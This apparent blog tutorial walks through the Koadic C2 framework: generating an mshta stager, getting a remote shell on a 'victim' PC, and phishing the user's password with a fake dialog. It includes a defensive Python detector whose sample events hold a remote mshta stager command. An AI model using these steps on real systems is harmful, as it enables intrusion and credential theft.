Koadic C3 – COM Command & Control
Koadic (originally developed by zerosum0x0, https://twitter.com/zerosum0x0), or COM Command & Control🤖, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 1️⃣0️⃣.
It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).
- Hooks a zombie
- Elevates integrity (UAC Bypass)
- Dumps SAM/SECURITY hive for passwords
- Scans local network for open SMB
- Pivots to another machine
# Installation 📥
While installing this tool, make sure you are using a root terminal, or use ‘sudo’ when cloning the repository from GitHub.
git clone https://github.com/zerosum0x0/koadic.git
Or 🤷🏻‍♂️
sudo apt install koadic
After cloning the tool from GitHub, we have to install the dependencies using the following commands 👇🏼
apt-get install python3-pip
pip3 install -r requirements.txt
To run it, you just need to type koadic and you’ll be presented with the banner 📺.
We will select Mshta for now! I’ve also used Regsvr but was facing connection timed-out issues! You can try it out yourself if you want.
We will spawn a stager for ‘Mshta’, execute it on the target, and get a shell back in our command and control server.
Module Description
stager/js/mshta - serves payloads in memory using MSHTA.exe HTML Applications
stager/js/regsvr - serves payloads in memory using regsvr32.exe COM+ scriptlets
stager/js/rundll32_js - serves payloads in memory using rundll32.exe
stager/js/disk - serves payloads using files on disk
stager/js/wmic - serves payloads in memory using WMIC
stager/js/bitsadmin - transfers a .wsf payload containing JScript over a Bitsadmin job and executes it
Use the command: use stager/js/mshta
Then run the command ‘Info’ to see the available options. We can use the ‘set’ option to set ‘LHOST’ (your IP address) and ‘LPORT’ (listening port), which is where the session will call back to.
The next step is to generate the stager and execute it on the victim PC.
Once the stager is generated we have our payload. Executing it on the victim PC gives us a remote session on the C&C server.
AAYOO! HOLD ON! What is Mshta.exe?🫣
Mshta.exe is a utility that executes Microsoft HTML Application (HTA) files. HTAs are standalone applications that execute using the same models and technologies as Internet Explorer, but outside of the browser.
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer’s security context, it also bypasses browser security settings.
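As an added defensive example (not code from the original post or the Koadic project), here is a small Python check that runs the detection logic a SOC would want for this technique over a few constructed process-creation events (Sysmon Event ID 1 style Image/CommandLine/ParentImage fields). It flags mshta.exe launches that carry a remote URL (the in-memory stager pattern), an inline javascript:/vbscript: argument, or an .hta file in a user-writable directory (the on-disk stager); the sample events, hosts and paths are made up.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# These are made-up illustrations, not logs captured from the original post.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://10.0.0.5:9999/ab12",          # remote stager
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',  # vendor HTA
     "ParentImage": r"C:\Program Files\Vendor\installer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe vbscript:Execute("...")',             # inline script
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\bob\AppData\Local\Temp\update.hta",  # on-disk stager
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

REMOTE_URL = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
# .hta launched from a directory an unprivileged user can write to
USER_WRITABLE_HTA = re.compile(r"\\(Temp|AppData|Users\\Public|Downloads)\\\S*\.hta\b", re.IGNORECASE)

def classify_event(event):
    """Return the reasons an mshta.exe launch looks suspicious (empty list if benign)."""
    if not event.get("Image", "").lower().endswith("\\mshta.exe"):
        return []
    cmd = event.get("CommandLine", "")
    reasons = []
    if REMOTE_URL.search(cmd):
        reasons.append("remote URL argument (in-memory stager pattern)")
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline javascript:/vbscript: payload")
    if USER_WRITABLE_HTA.search(cmd):
        reasons.append(".hta loaded from a user-writable directory")
    return reasons

def scan_events(events):
    """Map the index of each suspicious event to its list of reasons."""
    hits = {}
    for idx, event in enumerate(events):
        reasons = classify_event(event)
        if reasons:
            hits[idx] = reasons
    return hits

if __name__ == "__main__":
    for idx, reasons in scan_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']} -> {', '.join(reasons)}")
```

A real deployment would feed these fields from Sysmon or Security event 4688 (with command-line auditing enabled) rather than the constructed list.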
Now let’s move forward with our payload…we need to execute it on the victim PC.
As you can see, we got the callback from the payload to our C&C, where the new session is called zombie 0.
You can also check how many sessions are currently running on our C&C server by running the command ‘Sessions’.
Moving forward, once we have a stable connection with the victim PC we can directly spawn a shell on it and browse the file system.
To interact with the shell, run the command ‘cmdshell <zombie ID>’; here I’ve written 0 as my zombie ID is 0.
We can also use other functions such as the phishing dialog box…to be honest it’s not that believable in my opinion, but it will still work if the user is noob AF!
For this we need to use ‘Implants’.
We will execute ‘use implant/phish/password_box’.
After running this, a popup box appears on the victim PC asking for the password of the currently logged-in user…
Once the user has entered the password in the popup box and hit the OK button…we will get the same input in our CnC terminal.
Thank you so much if you are reading till here! I hope this helps you in understanding how attackers may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility.
I will be taking a short break of 1–2 weeks. I’m traveling to another country to study for my master’s…blogs will be back soon! 🫶🏻 Thank you so much, and if you want to reach out to me, here is my Twitter account; you can ping me anytime. Till then, peace out ✌🏻❤️🤜🏻🤛🏻.